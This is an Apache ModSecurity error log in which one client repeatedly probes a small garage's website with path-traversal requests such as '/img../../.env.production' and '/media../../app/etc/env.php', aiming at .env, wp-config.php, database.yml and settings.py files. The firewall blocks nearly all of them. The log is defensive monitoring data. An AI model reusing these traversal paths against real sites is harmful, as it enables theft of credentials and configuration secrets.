[Tue May 12 05:24:18.778165 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdYQgpmE1yW0glLdgtGgAAAMA"]
[Tue May 12 05:24:18.794798 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdYggpmE1yW0glLdgtIwAAAMA"]
[Tue May 12 05:24:18.794869 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdYggpmE1yW0glLdgtIwAAAMA"]
[Tue May 12 05:24:18.795049 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdYggpmE1yW0glLdgtIwAAAMA"]
[Tue May 12 05:24:20.515646 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdYggpmE1yW0glLdgtIwAAAMA"]
[Tue May 12 05:24:20.532035 2026] [access_compat:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:24:22.254062 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdZggpmE1yW0glLdgtNgAAAMA"]
[Tue May 12 05:24:22.254370 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdZggpmE1yW0glLdgtNgAAAMA"]
[Tue May 12 05:24:25.000812 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdZggpmE1yW0glLdgtNgAAAMA"]
[Tue May 12 05:24:25.017590 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdaQgpmE1yW0glLdgtRgAAAMA"]
[Tue May 12 05:24:25.017791 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdaQgpmE1yW0glLdgtRgAAAMA"]
[Tue May 12 05:24:26.714765 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdaQgpmE1yW0glLdgtRgAAAMA"]
[Tue May 12 05:24:26.731579 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdaggpmE1yW0glLdgtUAAAAMA"]
[Tue May 12 05:24:26.731777 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdaggpmE1yW0glLdgtUAAAAMA"]
[Tue May 12 05:24:28.453791 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdaggpmE1yW0glLdgtUAAAAMA"]
[Tue May 12 05:24:28.470455 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdbAgpmE1yW0glLdgtWwAAAMA"]
[Tue May 12 05:24:28.470523 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdbAgpmE1yW0glLdgtWwAAAMA"]
[Tue May 12 05:24:28.470647 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdbAgpmE1yW0glLdgtWwAAAMA"]
[Tue May 12 05:24:30.212281 2026] [security2:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdbAgpmE1yW0glLdgtWwAAAMA"]
[Tue May 12 05:24:30.228367 2026] [core:error] [pid 1825287:tid 1825304] [client 45.148.10.238:60098] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 05:24:32.002726 2026] [core:error] [pid 1808852:tid 1808878] [client 45.148.10.238:25738] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 05:24:33.778172 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdcfaAnTZtx1_H_wy2cQAAAVA"]
[Tue May 12 05:24:33.778258 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdcfaAnTZtx1_H_wy2cQAAAVA"]
[Tue May 12 05:24:33.778434 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKdcfaAnTZtx1_H_wy2cQAAAVA"]
[Tue May 12 05:24:35.486932 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdcfaAnTZtx1_H_wy2cQAAAVA"]
[Tue May 12 05:24:35.505450 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdc_aAnTZtx1_H_wy2cgAAAVA"]
[Tue May 12 05:24:35.505519 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdc_aAnTZtx1_H_wy2cgAAAVA"]
[Tue May 12 05:24:35.505688 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdc_aAnTZtx1_H_wy2cgAAAVA"]
[Tue May 12 05:24:37.215120 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdc_aAnTZtx1_H_wy2cgAAAVA"]
[Tue May 12 05:24:37.232564 2026] [access_compat:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:24:39.984910 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdd_aAnTZtx1_H_wy2dQAAAVA"]
[Tue May 12 05:24:39.985126 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdd_aAnTZtx1_H_wy2dQAAAVA"]
[Tue May 12 05:24:41.686312 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdd_aAnTZtx1_H_wy2dQAAAVA"]
[Tue May 12 05:24:41.704060 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdefaAnTZtx1_H_wy2dgAAAVA"]
[Tue May 12 05:24:41.704268 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdefaAnTZtx1_H_wy2dgAAAVA"]
[Tue May 12 05:24:43.102159 2026] [autoindex:error] [pid 1820198:tid 1820200] [client 65.49.1.66:46776] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:24:43.488826 2026] [security2:error] [pid 1844863:tid 1844885] [client 45.148.10.238:15520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdefaAnTZtx1_H_wy2dgAAAVA"]
